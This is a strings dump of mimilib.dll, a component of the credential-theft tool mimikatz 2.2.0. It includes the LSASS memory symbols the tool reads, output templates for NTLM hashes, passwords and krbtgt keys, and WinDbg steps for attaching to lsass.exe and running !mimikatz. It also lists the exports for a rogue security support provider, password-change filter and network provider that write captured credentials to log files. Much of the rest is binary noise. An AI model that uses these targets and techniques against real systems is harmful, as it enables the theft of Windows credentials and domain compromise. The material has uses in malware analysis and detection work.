!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
PVVVVVVj
|UVj h0X
|nVj h
KSSMuw
|$4Wj@
Y9|$4vN
GY;|$4r
FVWWWW
tWHt!Ht
Ht-Ht#Ht
t$|h8g
URPQQhp@
UQPXY]Y[
bcrypt.dll
```hhh
xppwpp
DhcpServerCalloutEntry
CredUnPackAuthenticationBufferW
CredIsProtectedW
CredUnprotectW
CredentialKeys
Primary
[%08x] %Z
n.e. (Lecture KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)
n.e. (Lecture KIWI_MSV1_0_CREDENTIALS KO)
* Key List
[%08x]
[%08x]
* GUID :
* Time :
* MasterKey :
\x%02x
0x%02x,
null
des_plain
des_cbc_crc
des_cbc_md4
des_cbc_md5
des_cbc_md5_nt
rc4_plain
rc4_plain2
rc4_plain_exp
rc4_lm
rc4_md4
rc4_sha
rc4_hmac_nt
rc4_hmac_nt_exp
rc4_plain_old
rc4_plain_old_exp
rc4_hmac_old
rc4_hmac_old_exp
aes128_hmac_plain
aes256_hmac_plain
aes128_hmac
aes256_hmac
unknow
[ERROR] [RPC Decode] Exception 0x%08x: (%u)
[ERROR] [RPC Decode] MesIncrementalHandleReset: %08x
[ERROR] [RPC Decode] MesDecodeIncrementalHandleCreate: %08x
[ERROR] [RPC Free] Exception 0x%08x: (%u)
[ERROR] [RPC Free] MesDecodeIncrementalHandleCreate: %08x
credman
dpapisrv!g_MasterKeyCacheList
lsasrv!g_MasterKeyCacheList
masterkey
msv1_0!SspCredentialList
kerberos!KerbGlobalLogonSessionTable
kerberos
livessp!LiveGlobalLogonSessionList
livessp
wdigest!l_LogSessList
wdigest
tspkg!TSGlobalCredTable
CachedUnlock
CachedRemoteInteractive
CachedInteractive
RemoteInteractive
NewCredentials
NetworkCleartext
Unlock
Service
Network
Interactive
Unknown !
UndefinedLogonType
.#####. mimikatz 2.2.0 (x86) built on Sep 19 2022 17:43:18
.## ^ ##. "A La Vie, A L'Amour" - Windows build %hu
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' https://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' WinDBG extension ! * * */
===================================
# * Kernel mode * #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
# * User mode * #
===================================
0:000> !mimikatz
===================================
( (
) )
.______.
| |]
\ /
`----'
lsasrv!LogonSessionLeakList
lsasrv!InitializationVector
lsasrv!hAesKey
lsasrv!h3DesKey
lsasrv!LogonSessionList
lsasrv!LogonSessionListCount
kdcsvc!SecData
krbtgt keys
===========
Current
Previous
SekurLSA
========
Authentication Id : %u ; %u (%08x:%08x)
Session : %s from %u
User Name : %wZ
Domain : %wZ
Logon Server : %wZ
Logon Time :
SID :
[ERROR] [LSA] Symbols
%p - lsasrv!LogonSessionListCount
%p - lsasrv!LogonSessionList
[ERROR] [CRYPTO] Acquire keys
[ERROR] [CRYPTO] Symbols
%p - lsasrv!InitializationVector
%p - lsasrv!hAesKey
%p - lsasrv!h3DesKey
[ERROR] [CRYPTO] Init
* Username : %wZ
* Domain : %wZ
* LM :
* NTLM :
* SHA1 :
* DPAPI :
* Raw data :
* Smartcard
PIN code : %wZ
Model : %S
Reader : %S
Key name : %S
Provider : %S
%s
<no size, buffer is incorrect>
Unknown version in Kerberos credentials structure
* Username : %wZ
* Domain : %wZ
* Password :
LUID KO
* RootKey :
* %08x :
* LSA Isolated Data: %.*s
Unk-Key :
Encrypted:
SS:%u, TS:%u, DS:%u
0:0x%x, 1:0x%x, 2:0x%x, 3:0x%x, 4:0x%x, E:
, 5:0x%x
* unkData1 :
unkData2 :
%s krbtgt:
%u credentials
* %s :
* RSA key
PVK (private key)
DER (public key and certificate)
* Legacy key
* Unknown key (seen as %08x)
lsasrv!g_guidPreferredKey
lsasrv!g_pbPreferredKey
lsasrv!g_cbPreferredKey
lsasrv!g_guidW2KPreferredKey
lsasrv!g_pbW2KPreferredKey
lsasrv!g_cbW2KPreferredKey
lsasrv!g_fSystemCredsInitialized
lsasrv!g_rgbSystemCredMachine
lsasrv!g_rgbSystemCredUser
dpapisrv!g_guidPreferredKey
dpapisrv!g_pbPreferredKey
dpapisrv!g_cbPreferredKey
dpapisrv!g_guidW2KPreferredKey
dpapisrv!g_pbW2KPreferredKey
dpapisrv!g_cbW2KPreferredKey
dpapisrv!g_fSystemCredsInitialized
dpapisrv!g_rgbSystemCredMachine
dpapisrv!g_rgbSystemCredUser
DPAPI Backup keys
=================
Current prefered key:
Compatibility prefered key:
DPAPI System
============
full:
m/u :
bcrypt.dll
BCryptOpenAlgorithmProvider
BCryptGenerateSymmetricKey
BCryptCloseAlgorithmProvider
BCryptDecrypt
BCryptSetProperty
BCryptDestroyKey
BCryptGetProperty
OpenProcessToken
CreateRestrictedToken
CreateProcessAsUserW
ConvertSidToStringSidA
IsTextUnicode
ADVAPI32.dll
RtlEqualString
RtlStringFromGUID
RtlFreeUnicodeString
ntdll.dll
MesDecodeIncrementalHandleCreate
MesHandleFree
MesIncrementalHandleReset
NdrMesTypeDecode2
NdrMesTypeFree2
RPCRT4.dll
CoCreateInstance
ole32.dll
GetCurrentProcess
CloseHandle
FreeLibrary
LoadLibraryW
lstrlenW
GetProcAddress
InterlockedIncrement
InterlockedDecrement
GetLastError
VirtualProtect
LocalAlloc
LocalFree
GetTimeFormatA
GetDateFormatA
FileTimeToSystemTime
FileTimeToLocalFileTime
RaiseException
InterlockedExchange
LoadLibraryA
KERNEL32.dll
_wfopen
fclose
malloc
_stricmp
vfwprintf
fflush
msvcrt.dll
memset
memcpy
_XcptFilter
_initterm
_amsg_exit
RtlUnwind
InterlockedCompareExchange
TerminateProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
QueryPerformanceCounter
GetTickCount
GetCurrentThreadId
GetCurrentProcessId
GetSystemTimeAsFileTime
_except_handler3
mimilib.dll
DhcpNewPktHook
DhcpServerCalloutEntry
DllCanUnloadNow
DllGetClassObject
DnsPluginCleanup
DnsPluginInitialize
DnsPluginQuery
ExtensionApiVersion
InitializeChangeNotify
Msv1_0SubAuthenticationFilter
Msv1_0SubAuthenticationRoutine
NPGetCaps
NPLogonNotify
PasswordChangeNotify
SpLsaModeInitialize
WinDbgExtensionDllInit
coffee
mimikatz
startW
/060O0U0u0
2'262;2A2h2|2
3/3C3P3n3
3 4*4;4N4
5)5;5A5K5U5
6(6N6a6x6~6
8$838L8S8q8|8
9#9(9.9F9K9Q9c9k9p9
9 :1:;:M:V:
<5<\<b<l<
= =&=K=
>#>)>/>E>[>f>}>
?"?D?M?S?h?n?y?
0-0G0M0d0x0
1 1B1K1Q1i1
2-232I2O2g2~2
2&3C3K3`3h3p3
4:4O4U4
5<5a5v5
6(7A7R7|7
8$8*80868<8D8H8L8P8T8X8\8`8d8h8l8p8
8N9T9c9i9{9
:!:&:+:>:C:H:W:k:u:z:
;";';1;6;@;E;O;[;f;l;|;
<'<4<L<
>!>'>J>P>V>f>k>q>
?+?1?;?A?U?[?j?p?
1$1P1V1~1
4L4R4e4k4
5"555;5Z5`5t5z5
6#656G6e6u6{6
757E7K7i7o7
8,8?8F8W8o8
8-939K9Q9[9`9e9k9}9
: :%:.:3:::@:E:M:R:Z:_:g:l:u:z:
:*;7;=;[;n;w;};
<-<6<_<i<
=#=(=3=8=C=H=S=a=
>4>O>[>c>
>&?2?:?d?q?
1(202H2
393A3G3M3s3|3
4"4(454E4Z4d4
7-73797?7E7K7R7Y7`7g7n7u7|7
:O:T:k:
2@3D3H3L3`3
; ;$;,;0;L;P;\;`;l;p;|;
(3,3034383<3@3D3H3L3P3T3X3\3`3l3p3t3|3
4@4D4H4L4
kiwidns.log
%S (%hu)
kiwifilter.log
[%08x] %wZ
kiwinp.log
[%08x:%08x] %s %wZ\%wZ
KiwiSSP
Kiwi Security Support Provider
kiwissp.log
[%08x:%08x] [%08x] %wZ\%wZ (%wZ)
kiwisub.log
%u (%u) - %wZ\%wZ (%wZ) (%hu)
kcredentialprovider.log
Credui.dll
advapi32.dll
ChainingModeCBC
ChainingMode
ObjectLength
ChainingModeCFB
(null)
%02x%s
VS_VERSION_INFO
StringFileInfo
040904b0
ProductName
mimilib (mimikatz)
ProductVersion
2.2.0.0
CompanyName
gentilkiwi (Benjamin DELPY)
FileDescription
mimilib for Windows (mimikatz)
FileVersion
2.2.0.0
InternalName
mimilib
LegalCopyright
Copyright (c) 2007 - 2021 gentilkiwi (Benjamin DELPY)
OriginalFilename
mimilib.dll
PrivateBuild
Build with love for POC only
SpecialBuild
VarFileInfo
Translation